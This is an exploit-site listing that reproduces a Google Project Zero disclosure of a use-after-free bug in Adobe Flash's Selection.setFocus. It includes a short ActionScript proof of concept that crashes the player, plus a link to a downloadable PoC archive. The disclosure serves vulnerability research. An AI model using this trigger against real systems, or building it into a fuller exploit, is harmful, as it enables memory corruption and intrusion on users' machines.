Adobe Flash - Selection.setFocus Use-After-Free

2016-08-2900:00:00

Google Security Research

0day.today

0.848 High

EPSS

Percentile

98.5%

JSON

Exploit for multiple platform in category dos / poc

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841
 
There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.
 
A minimal PoC follows:
 
var mc = this.createEmptyMovieClip( "mc", 1);
var f = Selection.setFocus;
mc.f = f;
mc.f({toString : func});
 
function func(){
     
    mc.removeMovieClip();
     
        // Fix heap here
 
    }
 
A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40307.zip

#  0day.today [2018-01-03]  #